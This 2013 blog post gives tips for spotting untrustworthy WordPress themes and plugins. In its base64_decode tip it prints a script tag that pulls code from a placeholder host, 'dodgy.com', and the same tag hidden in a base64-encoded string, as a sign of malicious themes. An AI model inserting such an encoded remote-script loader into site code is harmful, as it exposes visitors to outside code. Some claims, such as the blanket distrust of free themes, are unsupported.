How to Stay Away From Vulnerable WordPress Themes & Plugins?

7 Ways to Know Reliability of WordPress Themes & Plugins

Joseph Herb
4 min readAug 30, 2013

--

WordPress is one of the most popular content management systems with more than 60 million web sites. Most of the web developers are using this CMS as it contains uncountable number of plug-ins that written by third parties. All such kinds of plug-ins are best for making website an advance.

However, do you know that 20% of the 50 most popular WordPress themes and plug-ins are vulnerable or make harm to your website. Now, the question arises how one can recognize that their chosen themes and plug-ins are trustworthy?

There are some easy yet effective ways to recognize reliable themes and plug-ins so you can make your site more safe and secure.

1# Trust the WordPress Directory

There is no doubt WordPress plug-in directory is blessed with numerous plug-ins and themes that are available for free. What I like the most about this directory is it is maintained by the expert contributors of WordPress like Ipstenu.

They are sharing their invaluable time in taking quick action to act on untrustworthy content. Moreover, they are also removing abusive themes and plug-ins that harm to user’s site and creating bad impression of plug-in as well. The expert team of professional are reviewing each of themes and plug-in before publishing.

2# Numbers of Downloads and User’s Reviews

One of the best ways to know how fruitful and helpful is through number of downloads. There are different types of plug-ins with low download rates; however a plug-in with over 1 lac downloads is more trustworthy. Apart from concerning download counts, you can also read testimonials and client’s rating on plug-in. it is said that reviews are a great indication to know plug-in performance.

3# Look At Support Area

As we all have an idea that each plug-in and theme is hosted by its own support area. So, if it is advisable to look at the issues and see how they could affect to your installation. Moreover, it is also essential to consider the proportion of threads labelled resolved as it gives idea to author’s activity.

4# Different Versions

Most importantly, you have to check when your installed plug-in was last updated. It is advisable to avoid plug-in that hasn’t been updated in over two years. It is must as WordPress has changed a lot in term of coding and also has added new functions and processes that every developer has to adopt to make as it should be supportable with current versions.

5# Avoid Downloading Free Themes

For the sake of money, do not adopt free theme as they are not trustworthy both in terms of performance and security. It is very easy to create WordPress theme and code it smartly to manage whole installation process like user names, posts, pages and general login credentials. You have to avoid such things. Apart from, you also have to skip installing free version of premium theme or plug-in.

6# Avoid base64_decode

Developers can only find major offender of hidden abusive scripts through searching all the theme or plug-in files for “base64_”. There is no doubt function is honest intentions, however many people are using it for dishonest purpose. Such type of function is utilized by developer for inserting encoded scripts without your being able to search out easily. Say for Example: If any developer uses the following script like

<script type=”javascript” href=”http://dodgy.com/script.js”> </script>

The dodgy function they can use is

$str = base64_decode(‘PHNjcmlwdCB0eXBlPSJqYXZhc2NyaXB0IiBocmVmPSJodHRwOi8vZG9kZ3kuY29tL
3Nj
cmlwdC5qcyI+PC9zY3JpcHQ+’);

7# Check Developers Ability

There is no doubt thousands of WordPress theme designs are available from a well-known premium theme directory. Developers are choosing one of the most attractive for their client’s website. Sometimes, theme didn’t work very well after some editing work. So, developer has to decide many things before purchasing theme online.

Closing Thoughts
There are some effective signs to identify trustworthy WordPress Themes and Plugins that we have discussed. Hopefully, whenever you chose any themes and plug-ins consider thesee important aspects to keep your website safe and secure.

--

--